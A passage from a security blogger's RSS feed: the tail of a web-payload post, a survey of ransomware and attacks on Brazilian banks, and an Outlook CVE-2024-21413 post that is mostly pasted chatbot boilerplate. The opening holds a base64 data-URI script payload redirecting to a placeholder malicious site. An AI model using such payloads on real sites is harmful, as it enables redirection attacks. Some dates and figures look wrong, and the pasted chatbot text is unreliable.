𝒑𝒂𝒚𝒍𝒐𝒂𝒅𝒔:<br>data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb249J2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tJz48L3NjcmlwdD4=</p><p>Remember, it’s crucial to have proper authorization and permission before conducting any security testing, even if it’s in a controlled environment. <br>Unauthorized testing can lead to legal consequences. <br>Always follow ethical hacking guidelines and disclose any vulnerabilities responsibly. <br>If you’re testing a website you own or have permission to test, you may use these payloads with caution and ensure that you’re not causing harm to the target system.</p><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=46d5d16114c8" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[       ]]></title>
            <link>https://medium.com/@morganbinbash/-af057d8d6788?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/af057d8d6788</guid>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[bug-bounty]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Wed, 28 Feb 2024 15:37:44 GMT</pubDate>
            <atom:updated>2024-02-28T15:37:44.021Z</atom:updated>
            <content:encoded><![CDATA[<p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uJLZIB-DOmPz8vImCN0RCQ.jpeg" /></figure><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><p>Hᴇʟʟᴏ, ᴍʏ ᴅᴇᴄɪsɪᴏɴ ᴛᴏ ᴄʀᴇᴀᴛᴇ ᴛʜɪs ᴀʀᴛɪᴄʟᴇ ɪs ᴛᴏ ǫᴜɪᴄᴋʟʏ sᴜʀᴠᴇʏ ᴛʜᴇ ᴄʏʙᴇʀ ᴀᴛᴛᴀᴄᴋs ᴛʜᴀᴛ ᴄᴀᴜsᴇᴅ sᴇʀɪᴏᴜs ᴅᴀᴍᴀɢᴇ ᴛᴏ Bʀᴀᴢɪʟɪᴀɴ ғɪɴᴀɴᴄɪᴀʟ ɪɴsᴛɪᴛᴜᴛɪᴏɴs, ᴡʜɪᴄʜ sᴏᴍᴇʜᴏᴡ ᴅɪᴅ ɴᴏᴛ sᴘᴇɴᴅ ᴍᴜᴄʜ ᴛɪᴍᴇ ʙʀᴏᴡsɪɴɢ ᴛʜᴇ ɪɴғᴏʀᴍᴀᴛɪᴏɴ ᴍᴇᴅɪᴀ ᴏᴘᴇɴ ᴛᴏ ᴛʜᴇ ᴘᴜʙʟɪᴄ. ɪɴ ɢᴇɴᴇʀᴀʟ, ᴘᴇʀʜᴀᴘs ᴛᴏ ᴀᴠᴏɪᴅ ғᴜʀᴛʜᴇʀ ᴘᴏᴛᴇɴᴛɪᴀᴛɪɴɢ ᴛʜᴇ ᴄᴏɴsᴇǫᴜᴇɴᴄᴇs ᴏғ sᴜᴄʜ ɪɴᴄɪᴅᴇɴᴛs. Tʜᴇ ɪᴅᴇᴀ ɪs ᴛʜᴀᴛ ᴡᴇ ᴄᴀɴ ʀᴇғʟᴇᴄᴛ ᴏɴ ʜᴏᴡ ᴍᴜᴄʜ ᴛʜᴇ ᴅɪɢɪᴛᴀʟ sᴇᴄᴜʀɪᴛʏ ᴏғ sᴜᴄʜ ɪɴsᴛɪᴛᴜᴛɪᴏɴs ʜᴀs ʙᴇᴇɴ ɪᴍᴘʀᴏᴠᴇᴅ ɪɴ ʀᴇᴄᴇɴᴛ ʏᴇᴀʀs ɪɴ Bʀᴀᴢɪʟ, ᴏɴ ᴛʜᴇ ᴏᴛʜᴇʀ ʜᴀɴᴅ, ʜᴏᴡ ᴍᴜᴄʜ ᴡᴇ sᴛɪʟʟ ɴᴇᴇᴅ ᴛᴏ ᴇᴠᴏʟᴠᴇ, ɪɴ ᴛᴇʀᴍs ᴏғ ᴅɪɢɪᴛᴀʟ sᴇᴄᴜʀɪᴛʏ ғᴏʀ ᴜsᴇʀs, ʟɪɴᴋᴇᴅ ʙᴏᴅɪᴇs, sᴇʀᴠɪᴄᴇ ɪssᴜᴇs, ᴄᴏᴍᴍᴜɴɪᴄᴀᴛɪᴏɴ, ᴇᴛᴄ. .. Sᴏᴍᴇ ᴏᴛʜᴇʀ ᴀᴛᴛᴀᴄᴋs ɴᴏᴛ ʀᴇᴘᴏʀᴛᴇᴅ ʜᴇʀᴇ, ᴅᴏ ɴᴏᴛ ᴍᴀᴋᴇ ᴛʜᴇᴍ ᴀɴʏ ʟᴇss ɪᴍᴘᴏʀᴛᴀɴᴛ, ᴀɴᴅ ɪᴛ ɪs ɴᴏᴛ ɪᴍᴘᴏssɪʙʟᴇ ᴛᴏ ᴛᴀʟᴋ ᴀʙᴏᴜᴛ ᴛʜᴇᴍ ɪɴ ᴛʜᴇ ғᴜᴛᴜʀᴇ, ғᴏʟʟᴏᴡ ᴍᴇ ᴏɴ sᴏᴄɪᴀʟ ᴍᴇᴅɪᴀ, sʜᴀʀᴇ ʏᴏᴜʀ ɪᴅᴇᴀs, ɪᴛ ᴡɪʟʟ ʙᴇ ɢʀᴇᴀᴛ ᴛᴏ ᴋɴᴏᴡ ᴀʙᴏᴜᴛ ᴛʜᴇsᴇ. Tʜᴀɴᴋ ʏᴏᴜ ғᴏʀ ʀᴇᴀᴅɪɴɢ ᴀɴᴏᴛʜᴇʀ ᴏɴᴇ ᴏғ ᴍʏ ᴀʀᴛɪᴄʟᴇs, I ʙᴇʟɪᴇᴠᴇ I ᴄᴀɴ ᴄᴏɴᴛʀɪʙᴜᴛᴇ ɪɴ sᴏᴍᴇ ᴡᴀʏ, ᴜɴᴛɪʟ ɴᴇxᴛ ᴛɪᴍᴇ.</p><ol><li>𝑾𝒂𝒏𝒏𝒂𝑪𝒓𝒚 𝑹𝒂𝒏𝒔𝒐𝒎𝒘𝒂𝒓𝒆 (2017)</li></ol><p>While not specific to Brazil, the WannaCry ransomware affected numerous countries, including Brazil. It targeted vulnerable Windows systems, encrypting files and demanding ransom payments in Bitcoin.<br>The WannaCry ransomware attack primarily affected systems worldwide in May 2017, targeting computers running Microsoft Windows operating systems. The attack exploited a vulnerability in the Windows operating system, for which Microsoft had already released a patch.</p><p>Now you know what ransomware is and its two main types. Here you will see some well-known examples that will help you identify the dangers presented by ransomware:</p><p>&lt;Locky&gt;<br>Locky is ransomware that was first used for an attack in 2016 by an organized group of hackers. Locky encrypted more than 160 file types and was spread via fake emails with infected attachments. Users fell for the email’s trick and installed the ransomware on their computers. This propagation method is called phishing, and is a form of social engineering. Locky ransomware targets file types frequently used by designers, developers, engineers, and testers.</p><h4>WannaCry</h4><p>WannaCry was a ransomware attack that spread to more than 150 countries in 2017. It was designed to exploit a security vulnerability in Windows that was created by the NSA and leaked by the Shadow Brokers hacker group. WannaCry affected 230,000 computers worldwide. The attack hit a third of all UK National Health Service (NHS) hospitals, causing an estimated £92 million in damage. Users were blocked and a ransom in bitcoins was demanded. The attack exposed the problem of outdated systems, as the hacker exploited an operating system vulnerability for which a patch had long existed. The worldwide financial loss caused by WannaCry was approximately US$4 billion.</p><p>&lt;Bad Rabbit&gt;<br>Bad Rabbit was a 2017 ransomware attack that spread through so-called runtime attacks. Insecure websites were used to carry out the attacks. In a run-on ransomware attack, the user visits a real website, unaware that it has been compromised by hackers. In most runtime attacks, all that is required is for a user to open a page that has been compromised in this way. In this case, however, running an installer that contained disguised malware led to the infection. This is called a malware dropper. Bad Rabbit prompted the user to perform a fake installation of Adobe Flash, infecting the computer with malware.</p><p>&lt;Ryuk&gt;<br>Ryuk is a cryptographic Trojan that spread in August 2018 and disabled the recovery function of Windows operating systems. This made it impossible to restore the encrypted data without an external backup. Ryuk also encrypted network hard drives. The impact was enormous, and many of the US organizations that were targeted paid the demanded ransom amounts. Total damage is estimated to be more than $640,000.</p><p>&lt;Shade/Troldesh&gt;<br>The Shade or Troldesh ransomware attack occurred in 2015 and spread via spam emails with infected file links or attachments. Interestingly, the Troldesh attackers communicated directly with their victims via email. And victims with whom they built a “good relationship” received discounts. However, this type of behavior is an exception to the rule.</p><p>&lt;Jigsaw&gt;<br>Jigsaw is a ransomware attack that began in 2016. It got its name from an image it displayed of the well-known puppet from the Saw film franchise. With each additional hour that the ransom remained unpaid, the Jigsaw ransomware deleted more files. The use of the horror movie image caused additional stress among users.</p><p>&lt;CryptoLocker&gt;<br>CryptoLocker is ransomware that was first seen in 2007 and spread via infected email attachments. It searched for important data on infected computers and encrypted it. An estimated 500,000 computers were affected. Law enforcement and security companies eventually managed to control a global network of hacked home computers that were used to spread CryptoLocker. This allowed authorities and companies to intercept data sent over the network without criminals noticing. Ultimately, this resulted in the creation of an online portal where victims could obtain a key to unlock their data. This way, the data could be released without having to pay a ransom to criminals.</p><p>&lt;Petya&gt;<br>Petya (not to be confused with ExPetr) is a ransomware attack that first occurred in 2016 and resurfaced as GoldenEye in 2017. Instead of encrypting certain files, this malicious ransomware encrypted the victim’s entire hard drive. This was done by encrypting the Master File Table (MFT), which made it impossible to access files on the hard drive. Petya ransomware spread to corporate HR departments via a fake app containing an infected Dropbox link.</p><p>Another variant of Petya is Petya 2.0, which differs in some important ways. However, in terms of how the attack is carried out, both are equally fatal to the device.</p><p>&lt;GoldenEye&gt;<br>Petya’s resurgence as GoldenEye resulted in a global ransomware infection in 2017. GoldenEye, known as WannaCry’s “deadly sibling,” hit more than 2,000 targets, including major oil producers in Russia and several banks. In an alarming situation, GoldenEye forced staff at the Chernobyl nuclear power plant to manually check the area’s radiation level after access to their Windows computers was blocked.</p><p>&lt;GandCrab&gt;<br>GandCrab is an unscrupulous ransomware that threatened to reveal its victims’ pornographic habits. He claimed to have hacked the victim’s webcam and demanded a ransom. If the ransom was not paid, embarrassing footage of the victim would be published. After its first appearance in 2018, GandCrab continued to be developed into several versions. As part of the “No More Ransom” initiative, security providers and law enforcement authorities have developed a ransomware decryption tool to help victims recover their sensitive data stolen by GandCrab.</p><p>&lt;B0r0nt0k&gt;<br>B0r0nt0k is an encryption ransomware that specifically focuses on Windows and Linux servers. This harmful ransomware encrypts the files of a Linux server and appends the “.rontok” file extension. In addition to posing a threat to files, this malware also changes startup settings, disables functions and applications, and adds registry entries, files and programs.</p><p>&lt;Dharma Brrr ransomware&gt;<br>Brrr, the new Dharma ransomware, is manually installed by hackers who break into Internet-connected desktop services. As soon as the ransomware is activated by the hacker, it starts encrypting the files it finds. Encrypted data is given the extension “.id-[id].[email].brrr”.</p><p>&lt;FAIR RANSOMWARE ransomware&gt;<br>FAIR RANSOMWARE aims to encrypt data. Using a powerful algorithm, all the victim’s private documents and files are encrypted. Files encrypted with this malware have the “.FAIR RANSOMWARE” extension added to them.</p><p>&lt;MADO ransomware&gt;<br>MADO is another type of encryption ransomware. Data encrypted by this ransomware is given the “.mado” extension and can therefore no longer be opened.</p><h4>Ransomware attacks</h4><p>As already mentioned, ransomware finds its victims in all social classes. Typically, the ransom demanded is between $100 and $200. However, some attacks demand much more, especially if the hacker knows that the locked data represents a significant financial loss for the attacked company. Therefore, by using these methods, cybercriminals can accumulate huge amounts of money. In the following two examples, the victim of the cyber attack is, or was, more important than the type of ransomware used.</p><p>&lt;WordPress ransomware&gt;<br>WordPress ransomware, as the name suggests, targets WordPress website files. The victim is extorted in exchange for a cash ransom, as is typical of ransomware. The more popular a WordPress site is, the more likely it is to be attacked by cybercriminals using ransomware.</p><p>&lt;The Wolverine case&gt;<br>Wolverine Solutions Group (a healthcare services provider) was the victim of a ransomware attack in September 2018. The malware encrypted a large number of company files, making it impossible for many employees to open them. Fortunately, on October 3rd, forensic experts were able to decrypt and restore the data. However, much patient data was compromised in the attack. Names, addresses, medical data and other personal information may have fallen into the hands of cybercriminals.</p><p>&lt;Ransomware as a Service&gt; (RaaS)<br>Ransomware-as-a-service allows cybercriminals with little technical skill to carry out ransomware attacks. The malware is made available to buyers, which means less risk and greater gain for the software programmers.</p><p>Other source &gt; <a href="https://carnegieendowment.org/specialprojects/protectingfinancialstability/timeline">https://carnegieendowment.org/specialprojects/protectingfinancialstability/timeline</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/245/1*OxHcJZL1p4Sfjk1ROtc_DA.gif" /></figure><p>2. 𝘽𝘽 — 𝙗𝙧 𝘾𝙮𝙗𝙚𝙧 𝙃𝙚𝙞𝙨𝙩 (2016)</p><p>In 2016, hackers targeted Bank of Brazil and siphoned off millions of dollars. The attackers used sophisticated techniques to compromise the bank’s networks and execute fraudulent fund transfers.<br>Bank in Brasil (Bank of Brazil) who lost their full online presence and had all of its 36 domains, corporate email and DNS seized by a criminal hacker group who then used the websites to drop malware on the unsuspecting bank customers. Ouch.<br>Once Kaspersky Lab researchers Fabio Assolini and Dmitry Bestuzhev dug under the covers of this attack, they discovered that the attackers had extended their operations to nine other institutions worldwide.<br>At the outset, this looked like a site hijacking, but Assolini and Bestuzhev quickly discovered that much more was happening. The caper was uncovered last Oct. 22 when it was apparent the bank’s website was serving malware to each of its visitors. The malware was a Java file tucked inside a .zip archive loaded into the index file.<br>The depths of the compromise quickly became apparent. All 36 bank domains were under the attackers’ control, including the online, mobile, point-of-sale, financing and acquisitions, and more. Digging deeper, the researchers found the homepage was displaying a valid SSL certificate from Let’s Encrypt, a free Certificate Authority.<br>The researchers also reported finding phishing pages loaded onto bank domains trying to induce victims to enter payment card information.<br>“Imagine if one employee is phished and the attackers had access to the DNS tables, man that would be very bad,” Bestuzhev said. “If DNS was under control of the criminals, you’re screwed.”<br>The researchers stressed the importance of securing the DNS infrastructure and the need to take advantage of features such as two-factor authentication, which most registrars offer, but few customers use, the researchers said. “That’s exactly what happened with this bank,” Assolini said.<br>Their line of thought then follows that the cybercriminals used a spearphishing attack targeting an employee who had access to the banks DNS tables using the name of the certificate authority. Even IT people can get caught out now and then, and need advanced security awareness training to keep them alert.</p><p>Source &gt; <a href="https://www.linkedin.com/pulse/hacking-compromised-brazilian-bank-top-bottom-stu-sjouwerman/">https://www.linkedin.com/pulse/hacking-compromised-brazilian-bank-top-bottom-stu-sjouwerman/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/245/1*OxHcJZL1p4Sfjk1ROtc_DA.gif" /></figure><p>3. 𝙀𝙦𝙪𝙞𝙛𝙖𝙭 𝘿𝙖𝙩𝙖 𝘽𝙧𝙚𝙖𝙘𝙝 (2017)</p><p>Although Equifax is an American company, the breach exposed sensitive information of individuals worldwide, including in Brazil. It affected millions of people, leading to concerns about identity theft.<br>Equifax admitted in 2017 that hackers had stolen personal data from its system, including names, dates of birth and Social Security numbers of nearly half the US population. The incident also affected customers in Canada and the United Kingdom.</p><p>Source &gt; <a href="https://g1.globo.com/tecnologia/noticia/equifax-empresa-de-credito-dos-eua-sofre-ataque-hacker-e-dados-de-143-milhoes-de-pessoas-sao-expostos.ghtml">https://g1.globo.com/tecnologia/noticia/equifax-empresa-de-credito-dos-eua-sofre-ataque-hacker-e-dados-de-143-milhoes-de-pessoas-sao-expostos.ghtml</a></p><p>Other source &gt; <a href="https://exame.com/negocios/equifax-pagara-ate-us-700-milhoes-por-vazamento-de-dados-pessoais/">https://exame.com/negocios/equifax-pagara-ate-us-700-milhoes-por-vazamento-de-dados-pessoais/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/245/1*OxHcJZL1p4Sfjk1ROtc_DA.gif" /></figure><p>4. 𝘽𝙖𝙣𝙘𝙤 𝘽𝙧𝙖𝙙𝙚𝙨𝙘𝙤 𝙋𝙝𝙞𝙨𝙝𝙞𝙣𝙜 𝘼𝙩𝙩𝙖𝙘𝙠𝙨 &amp; 𝙤𝙩𝙝𝙚𝙧𝙨 (2016 / 2023)</p><p>Brazilian banks, including Banco Bradesco, have been targets of phishing attacks. These attacks involve fraudulent attempts to obtain sensitive information, such as login credentials and personal details, by posing as a trustworthy entity.<br>Given this scenario, it is essential that users remain alert and take extra care when providing personal information. It is important to always verify the veracity of the contact, never provide confidential data over the phone or email and always check the website URL before entering any information. Furthermore, it is recommended to use two-factor authentication features and keep your protection and antivirus software always up to date.</p><p>50 brands most used in phishing attacks<br>Check out the list of the 50 brands most used in phishing attacks<br>1 AT&amp;T Inc.<br>2 PayPal<br>3 Microsoft<br>4 DHL<br>5 Meta<br>6 Internal Revenue Service<br>7 Verizon<br>8 Mitsubishi UFJ NICOS Co., Ltd.<br>9 Adobe<br>10 Amazon<br>11 Apple<br>12 Wells Fargo &amp; Company<br>13 eBay, Inc.<br>14 Swiss Post<br>15 Naver<br>16 Instagram (Meta)<br>17 WhatsApp (Meta)<br>18 Rakuten<br>19 East Japan Railway Company<br>20 American Express Company<br>21 KDDI<br>22 Office365 (Microsoft)<br>23 Chase Bank<br>24 AEON<br>25 Singtel Optus Pty Limited<br>26 Coinbase Global, Inc.<br>27 Banco Bradesco S.A.<br>28 Caixa Econômica Federal<br>29 JCB Co., Ltd.<br>30 ING Group<br>31 HSBC Holdings plc<br>32 Netflix Inc<br>33 Sumitomo Mitsui Banking Corporation<br>34 Nubank<br>35 Bank Millennium SA<br>36 National Police Agency Japan<br>37 Allegro<br>38 InPost<br>39 Correos<br>40 FedEx<br>41 LinkedIn (Microsoft)<br>42 United States Postal Service<br>43 Alphabet<br>44 The Bank of America Corporation<br>45 Deutscher Paketdienst<br>46 Banco Itaú Unibanco S.A.<br>47 Steam<br>48 Swisscom AG<br>49 LexisNexis<br>50 Orange S.A.</p><p>Source &gt; <a href="https://www.mundoconectado.com.br/seguranca/quatro-bancos-brasileiros-estao-entre-os-mais-usados-para-ataques-de-phishing-segundo-a-cloudfare/">https://www.mundoconectado.com.br/seguranca/quatro-bancos-brasileiros-estao-entre-os-mais-usados-para-ataques-de-phishing-segundo-a-cloudfare/</a></p><p>Other source &gt; <a href="https://cryptoid.com.br/criptografia-identificacao-digital-id-biometria/118614/">https://cryptoid.com.br/criptografia-identificacao-digital-id-biometria/118614/</a><br><a href="https://www.uol.com.br/tilt/noticias/redacao/2019/11/09/falha-no-bradesco-permitia-que-hacker-sequestrasse-conta-online.htm">https://www.uol.com.br/tilt/noticias/redacao/2019/11/09/falha-no-bradesco-permitia-que-hacker-sequestrasse-conta-online.htm</a><br><a href="https://sudz.com.br/2023/07/bradesco-transparencia-seguranca-dos-dados-banco-bradesco-incidente-eua-dados-instituicao-financeira-comunicado-ao-mercado-ciberseguranca/">https://sudz.com.br/2023/07/bradesco-transparencia-seguranca-dos-dados-banco-bradesco-incidente-eua-dados-instituicao-financeira-comunicado-ao-mercado-ciberseguranca/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/245/1*OxHcJZL1p4Sfjk1ROtc_DA.gif" /></figure><p>5. 𝙊𝙥𝙚𝙧𝙖𝙩𝙞𝙤𝙣 𝘼𝙪𝙧𝙤𝙧𝙖 (2010)</p><p>While not exclusive to Brazil, Operation Aurora was a series of cyberattacks targeting several major companies, including Google. <br>The attackers gained unauthorized access to sensitive data, and the incident raised concerns globally.<br>Operation Aurora: an advanced persistent threat<br>For McAfee’s chief technology officer, George Kurtz, the threat landscape is changing. The Aurora operation, which included attacks on Google and other technology companies, through an unpatched breach in Internet Explorer, is an example of an “advanced persistent threat”.<br>An advanced persistent threat is, as the name suggests, a sophisticated invasion that slowly and persistently seeks to achieve its objective — usually information theft. The malicious codes used in this type of attack seek to hide their presence and, little by little, advance into the organization’s network. In Google’s case, the objective was to obtain the email messages of human rights activists involved in Chinese issues.<br>Kurtz explains that the first to have to face this type of problem were governments. Now, with Operation Aurora, the expert believes that organizations of all types are subject to being the target of sophisticated cyber attacks.</p><p>Source &gt; <a href="https://muitocurioso.org/operacao-aurora-serie-de-ataques-ciberneticos/#:~:text=Divulgado%20primeiramente%20ao%20p%C3%BAblico%20pelo%20Google%20em%2012,Networks%20e%20Rackspace%20confirmaram%20publicamente%20que%20foram%20alvo">https://muitocurioso.org/operacao-aurora-serie-de-ataques-ciberneticos/#:~:text=Divulgado%20primeiramente%20ao%20p%C3%BAblico%20pelo%20Google%20em%2012,Networks%20e%20Rackspace%20confirmaram%20publicamente%20que%20foram%20alvo</a>.</p><p>Other source &gt; <a href="https://www.exabeam.com/information-security/operation-aurora/">https://www.exabeam.com/information-security/operation-aurora/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mTrdqlKxf4UHCj-_nf_QeA.jpeg" /></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=af057d8d6788" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[    …]]></title>
            <link>https://medium.com/@morganbinbash/-4a9d5b35c361?source=rss-ef108b0e5738------2</link>
            <guid isPermaLink="false">https://medium.com/p/4a9d5b35c361</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[ctf-walkthrough]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Morgan Bin Bash]]></dc:creator>
            <pubDate>Fri, 16 Feb 2024 17:26:33 GMT</pubDate>
            <atom:updated>2024-02-16T17:26:33.796Z</atom:updated>
            <content:encoded><![CDATA[<h3>𝙈𝙞𝙘𝙧𝙤𝙨𝙤𝙛𝙩 𝙊𝙪𝙩𝙡𝙤𝙤𝙠 𝙍𝙚𝙢𝙤𝙩𝙚 𝘾𝙤𝙙𝙚 𝙀𝙭𝙚𝙘𝙪𝙩𝙞𝙤𝙣 𝙑𝙪𝙡𝙣𝙚𝙧𝙖𝙗𝙞𝙡𝙞𝙩𝙮</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MCTDHwrE2YKfxr6TPzeELQ.jpeg" /></figure><p><a href="https://linktr.ee/morganbinbash">@morganbinbash | Linktree</a></p><p>Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5<br>Outlook should warm you about the risk on opening an external link =&gt; but this is not the case!<br>As of my last knowledge update in January 2022, I don’t have specific information about a Microsoft Outlook Remote Code Execution Vulnerability with the details you provided. However, I can guide you on general steps to take when you come across security vulnerabilities:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/397/0*es0KYWbBKGCHqEvY" /></figure><p>Verify Information: <br>Ensure that the information you have is accurate and up-to-date. Check official sources such as Microsoft’s security advisories, the Common Vulnerabilities and Exposures (CVE) database, and other reputable security websites.</p><p>Apply Security Updates: <br>If a vulnerability is confirmed, it’s crucial to apply any available security updates or patches provided by Microsoft. Keeping your software up-to-date is one of the most effective ways to mitigate security risks.</p><p>Adjust Security Settings: <br>Consider adjusting your Outlook security settings to minimize potential risks. For example, disable unnecessary features, configure macro settings, and be cautious with opening attachments or links from unknown sources.</p><p>Security Best Practices: <br>Promote and follow security best practices within your organization. Educate users about the risks associated with email attachments and links, and encourage them to be vigilant about phishing attempts.</p><p>Monitor for Exploitation: <br>Regularly monitor your systems and networks for any signs of exploitation. Utilize security tools and practices to detect and respond to potential threats promptly.</p><p>Contact Microsoft Support: <br>If you have a Microsoft support agreement, consider reaching out to Microsoft Support for guidance and assistance.</p><p>Report to Microsoft: <br>If you believe you have discovered a new vulnerability, follow responsible disclosure practices. Report the issue to Microsoft or the appropriate security response team, providing details to help them understand and address the vulnerability.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/727/0*xI4dyiIySvJsj7kO" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/603/0*RWu3Vl4dTCMzHMrw" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*Fosnl8zIPKFBCdtS" /></figure><p><a href="https://github.com/duy-31/CVE-2024-21413/blob/main/README.md">CVE-2024-21413/README.md at main · duy-31/CVE-2024-21413</a></p><p>Please note that the details of vulnerabilities can change, and new information may emerge after my last update. Always refer to the latest sources and advisories for the most accurate and current information. If you have concerns about a specific vulnerability, it’s advisable to consult with your organization’s IT security team or a trusted cybersecurity professional.</p><p><a href="https://beacons.ai/morganbinbash">https://beacons.ai/morganbinbash</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=4a9d5b35c361" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>